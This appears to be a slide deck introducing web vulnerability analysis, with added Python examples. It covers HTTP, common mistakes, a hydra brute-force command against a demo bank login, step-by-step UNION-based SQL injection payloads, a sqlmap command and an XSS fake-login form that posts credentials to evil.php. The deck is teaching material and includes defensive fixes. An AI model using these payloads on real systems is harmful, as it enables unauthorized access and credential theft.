Introduction to Web Vulnerability Analysis (Introdução à Análise de Vulnerabilidades Web)

Uploaded by: twisting-the-truth

Posted on 12-Apr-2017

Hack The Potat0

Introdução à Análise de Vulnerabilidades Web

Organization: Oeste Hacker Club (OHC) - http://oestehc.com.br/

Bruno "dropped" Criado - {bruno|dropped}[at]tttruth.com - http://tttruth.com

About me

Freelancer (Sec/Dev)

Security enthusiast for more than 15 years

IT professional for more than 10 years (Infrastructure/Networks/Development)

Founding member of OHC

HTTP/1.1 protocol: RFC 2616 (obsoleted in 2014 by RFCs 7230-7235, which describe the same wire format)

curl -v http://www.pudim.com.br

nc www.pudim.com.br 80
GET / HTTP/1.1
Host: www.pudim.com.br

nc oestehc.com.br 80
GET / HTTP/1.1
Host: oestehc.com.br

(HTTP/1.1 requires the Host header; type it after the request line, then send an empty line to end the request, otherwise the server answers 400 or waits for more headers.)

HTTP/1.1 methods

GET

HEAD

POST

PUT

PATCH

OPTIONS

DELETE

TRACE

CONNECT

HTTP/1.1 status codes

1xx Informational

2xx Successful

3xx Redirection

4xx Client Error

5xx Server Error
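The raw HTTP/1.1 exchange that nc lets you type by hand, as an added example (this code is not from the original slides): build_request() produces the exact bytes of a request, including the mandatory Host header, and parse_response() splits a response into status line, headers and body and names the status class from the list above. The sample response is constructed, not captured from www.pudim.com.br or any other host; send_request() is the optional live equivalent of nc and needs network access.

```python
# Added example (not from the original slides): the raw HTTP/1.1 exchange that
# "nc host 80" lets you type by hand, as code. build_request() produces the
# exact bytes; parse_response() splits a response into status, headers and
# body and classifies the status code as on the slide above.
import socket

STATUS_CLASSES = {1: "Informational", 2: "Successful", 3: "Redirection",
                  4: "Client Error", 5: "Server Error"}

def build_request(method, path, host, headers=None, body=b""):
    """Return an HTTP/1.1 request as bytes.

    HTTP/1.1 requires the Host header (RFC 2616 section 14.23); leaving it
    out when typing into nc is the usual reason for a 400 Bad Request.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append(f"Content-Length: {len(body)}")
    lines.append("Connection: close")
    # The header block ends with an empty line: CRLF CRLF.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body

def parse_response(raw):
    """Split a raw response into its parts and name the status class."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parts = status_line.split(" ", 2)
    version, code = parts[0], int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"version": version, "status": code, "reason": reason,
            "class": STATUS_CLASSES.get(code // 100, "Unknown"),
            "headers": headers, "body": body}

def send_request(host, port, request, timeout=5.0):
    """What nc does: open a TCP connection, write the bytes, read until close."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

# Constructed sample response; not captured from www.pudim.com.br or any host.
SAMPLE_RESPONSE = (b"HTTP/1.1 301 Moved Permanently\r\n"
                   b"Server: Apache\r\n"
                   b"Location: https://www.example.com/\r\n"
                   b"Content-Length: 0\r\n"
                   b"\r\n")

if __name__ == "__main__":
    req = build_request("GET", "/", "www.pudim.com.br")
    print(req.decode("ascii"))
    print(parse_response(SAMPLE_RESPONSE))
    # Live version (network required):
    # print(parse_response(send_request("www.pudim.com.br", 80, req)))
```

The request bytes are what Burp or ZAP show in their raw request editor; comparing them with what the browser sends is the quickest way to spot headers (cookies, custom tokens) that a server relies on.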

OWASP Top 10 2013

Most common mistakes

Lack of canonicalization (input is checked before it is decoded and normalized, so an encoded version of a blocked value gets through)

Client-side-only checks (JavaScript validation that an attacker skips by sending the request through a proxy)

Obscurity (hidden URLs, parameters or source code instead of real access control)
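The "lack of canonicalization" mistake as code, as an added example (not from the original slides): naive_is_safe() looks for ".." in the raw request value, so a URL-encoded "../" walks past it, while hardened_is_safe() decodes and normalizes the value first and checks the path the server would actually open. DOC_ROOT and the probe values are assumed for the example.

```python
# Added example (not from the original slides): the "lack of canonicalization"
# mistake. naive_is_safe() checks the raw request value, so an encoded "../"
# walks past it; hardened_is_safe() decodes and normalizes first and checks
# the path the server would actually open. DOC_ROOT is an assumed value.
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"   # assumed document root for the example

def naive_is_safe(requested):
    """Rejects only a literal '..' in the undecoded value: the bug."""
    return ".." not in requested

def canonical_path(requested):
    """Decode, normalize separators, join to the root and collapse '..'."""
    decoded = unquote(requested).replace("\\", "/")
    # lstrip('/') so an absolute path is treated as relative to DOC_ROOT
    return posixpath.normpath(posixpath.join(DOC_ROOT, decoded.lstrip("/")))

def hardened_is_safe(requested):
    """Check the canonical form: it must stay under DOC_ROOT."""
    full = canonical_path(requested)
    return full == DOC_ROOT or full.startswith(DOC_ROOT + "/")

# Constructed request values: a normal file, two encoded traversals, an absolute path
PROBES = ["images/logo.png",
          "%2e%2e/%2e%2e/etc/passwd",
          "%2e%2e%5c%2e%2e%5cwindows/win.ini",
          "/etc/passwd"]

if __name__ == "__main__":
    for p in PROBES:
        print(f"{p:36} naive={naive_is_safe(p)!s:5} "
              f"hardened={hardened_is_safe(p)!s:5} -> {canonical_path(p)}")
```

The rule the example illustrates: decode and normalize exactly as the component that uses the value will, then validate the result; validating a different representation than the one that gets used is what the bypass exploits.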

Tools

OWASP ZAP / Burp Suite

wfuzz / dirb / dirbuster

w3af / arachni / Vega

sqlmap

(x)hydra / brutus

HTTP Proxy

Breaking authentication - (x)hydra

hydra -p naosei -L /usr/share/wordlists/wfuzz/general/common.txt www.testfire.net http-post-form "/bank/login.aspx:uid=^USER^&passw=^PASS^&btnSubmit=Login:Please try again"

-L gives the list of usernames to try and -p the single password tried against each of them (a -P wordlist would brute-force passwords instead). The http-post-form argument is "path:POST body with ^USER^ and ^PASS^ placeholders:string that appears in the page when the login fails"; quote it so the shell does not treat & as a background operator.

SQL Injection

Step by step, with a UNION-based injection in a parameter such as page.php?id=1:

1. Find the number of columns

id=1 ORDER BY 5
id=1 ORDER BY 10
id=1 ORDER BY 15
(raise or lower the number until the query stops erroring: the largest value that still works is the column count)

id=1 UNION SELECT 1, 2, 3, ..., X
(alternatively, grow the UNION SELECT list until the column count matches and the error disappears)

2. Find which column is printed on the page

id=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7
(the numbers that show up in the page are the columns whose content is reflected; in the payloads below it is column 6; use an id that returns no rows, such as id=-1, so only the UNION row is displayed)

3. Get information about the database (MySQL functions)

id=1 UNION SELECT 1, 2, 3, 4, 5, @@version, 7
id=1 UNION SELECT 1, 2, 3, 4, 5, @@hostname, 7
id=1 UNION SELECT 1, 2, 3, 4, 5, current_user(), 7
id=1 UNION SELECT 1, 2, 3, 4, 5, database(), 7
id=1 UNION SELECT 1, 2, 3, 4, 5, uuid(), 7

4. Get information from other tables/databases

id=1 UNION SELECT 1, 2, 3, 4, 5, table_name, 7 FROM information_schema.tables
id=1 UNION SELECT 1, 2, 3, 4, 5, column_name, 7 FROM information_schema.columns
(add WHERE table_name = ... to list the columns of one table, then SELECT those columns FROM that table)
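The four steps above run end to end, as an added example that is not from the original slides: a page.php?id= style lookup that concatenates the parameter into SQL, against an in-memory SQLite database filled with constructed data. MySQL's @@version and information_schema become SQLite's sqlite_version(), sqlite_master and pragma_table_info() (the latter needs SQLite 3.16 or later); the table, column and account names are invented for the example, and the parameterized safe_lookup() is the fix.

```python
# Added example (not from the original slides): the four UNION-injection steps
# run against an in-memory SQLite database of constructed data. MySQL's
# @@version / information_schema become SQLite's sqlite_version() /
# sqlite_master / pragma_table_info() (SQLite >= 3.16); the technique is the same.
import re
import sqlite3

def build_db():
    """Constructed schema and rows; nothing here comes from a real site."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, "
                "descr TEXT, sku TEXT, vendor TEXT, stock INTEGER)")
    con.execute("INSERT INTO products VALUES "
                "(1, 'Pudim', 9.9, 'dessert', 'PD-1', 'OHC', 10)")
    con.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")
    return con

def vulnerable_lookup(con, id_param):
    """page.php?id=... done wrong: the parameter is concatenated into the SQL."""
    sql = "SELECT * FROM products WHERE id=" + id_param
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return f"ERROR: {e}"   # the error text reaches the page, as on many real sites

def render_page(rows):
    """The page prints only name, price and descr (columns 2, 3 and 4)."""
    if isinstance(rows, str):
        return rows
    return "\n".join(" | ".join(str(r[i]) for i in (1, 2, 3)) for r in rows)

def find_column_count(con, max_cols=30):
    """Step 1: ORDER BY n works while n <= number of columns, then errors."""
    n = 1
    while n <= max_cols and not render_page(
            vulnerable_lookup(con, f"1 ORDER BY {n}")).startswith("ERROR"):
        n += 1
    return n - 1

def find_reflected_columns(con, ncols):
    """Step 2: UNION SELECT 1, 2, ..., n with id=-1 so only our row is shown;
    the markers that appear in the page are the columns it prints."""
    markers = ", ".join(str(i) for i in range(1, ncols + 1))
    page = render_page(vulnerable_lookup(con, f"-1 UNION SELECT {markers}"))
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", page)]

def extract(con, ncols, expr, from_clause="", col=2):
    """Steps 3 and 4: replace a reflected column's marker with an expression,
    optionally selecting it FROM a catalog or data table."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = expr
    payload = f"-1 UNION SELECT {', '.join(cols)} {from_clause}".rstrip()
    rows = vulnerable_lookup(con, payload)
    return [str(r[col - 1]) for r in rows]

def safe_lookup(con, id_param):
    """The fix: validate the type, then bind the value instead of concatenating."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT * FROM products WHERE id=?", (id_value,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("columns:", n, "reflected:", find_reflected_columns(db, n))
    print("version:", extract(db, n, "sqlite_version()"))
    print("tables:", extract(db, n, "name", "FROM sqlite_master WHERE type='table'"))
    print("users columns:", extract(db, n, "name", "FROM pragma_table_info('users')"))
    print("creds:", extract(db, n, "login || ':' || password", "FROM users"))
    print("safe:", safe_lookup(db, "-1 UNION SELECT 1,2,3,4,5,6,7"))
```

The extraction functions never parse SQL; they only watch whether the page errors or which marker it echoes, which is exactly the feedback an attacker has through a browser. That is also why the fix is binding the value (and rejecting anything that is not an integer) rather than filtering keywords like UNION.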

SQL Injection - sqlmap

sqlmap -u "http://www.site.com/page.php?id=2"

(sqlmap tests each parameter in the URL, here id, for injection and automates the column-count and extraction steps above; quote the URL so the shell leaves & and ? alone)

Cross-Site Scripting (XSS)

A parameter reflected into the page without encoding lets the attacker inject a fake login form. Rendered, the victim sees:

Dear user please provide password
Username:
Password:

The injected HTML (the form posts the credentials to the attacker's evil.php):

<h1>Dear user please provide password</h1><div style="background-color:#FF3300"><form action="http://127.0.0.1/evil.php">Username:<br><input type="text" name="user"><br>Password:<br><input type="text" name="pass"><br><input type=SUBMIT value="login" /></form></div>

URL-encoded, as it is placed in the vulnerable parameter:

%3Ch1%3EDear+user+please+provide+password%3C%2Fh1%3E%3Cdiv+style%3D%22background-color%3A%23FF3300%22%3E%3Cform+action%3D%22http%3A%2F%2F127.0.0.1%2Fevil.php%22%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%22text%22+name%3D%22user%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%22text%22+name%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3DSUBMIT+value%3D%22login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E
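The fake-login-form payload above, reflected into a page that echoes a query parameter, as an added example (not code from the original slides): vulnerable_page() inserts the decoded value raw, hardened_page() HTML-encodes it for the element-content context, and injected_form_present() checks whether a browser would build the attacker's form from the response. The page template and the parameter are assumed for the example.

```python
# Added example (not from the original slides): the fake-login-form payload
# above, reflected into a page that echoes a query parameter. vulnerable_page()
# inserts the decoded value raw; hardened_page() HTML-encodes it for the
# element-content context. The page template and parameter name are assumed.
from html import escape
from urllib.parse import quote_plus, unquote_plus

# The slide's injected HTML, with straight quotes.
PAYLOAD_HTML = ('<h1>Dear user please provide password</h1>'
                '<div style="background-color:#FF3300">'
                '<form action="http://127.0.0.1/evil.php">Username:<br>'
                '<input type="text" name="user"><br>Password:<br>'
                '<input type="text" name="pass"><br>'
                '<input type=SUBMIT value="login" /></form></div>')

# Assumed page template: the ?q= parameter is echoed into a paragraph.
PAGE = "<html><body><p>Results for: {q}</p></body></html>"

def vulnerable_page(q_param):
    """Reflects the decoded parameter straight into the HTML: the XSS."""
    return PAGE.replace("{q}", unquote_plus(q_param))

def hardened_page(q_param):
    """Same page; the value is HTML-escaped so tags and quotes become text."""
    return PAGE.replace("{q}", escape(unquote_plus(q_param), quote=True))

def injected_form_present(html_out):
    """Would a browser build the attacker's form from this response?"""
    return "<form action=" in html_out

if __name__ == "__main__":
    wire = quote_plus(PAYLOAD_HTML)   # what goes into ?q=... on the wire
    print(wire[:60] + "...")
    print("vulnerable:", injected_form_present(vulnerable_page(wire)))
    print("hardened:  ", injected_form_present(hardened_page(wire)))
    print(hardened_page(wire)[:120])
```

html.escape() is the right encoder only for HTML element content and quoted attributes; a value placed inside a script block, a URL or a style needs that context's encoder instead, which is why "encode for the output context" rather than "strip tags" is the rule.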

Think about it!

Distrust external data

The data can be forged

Always validate

Prevent and handle errors

Review

Test the security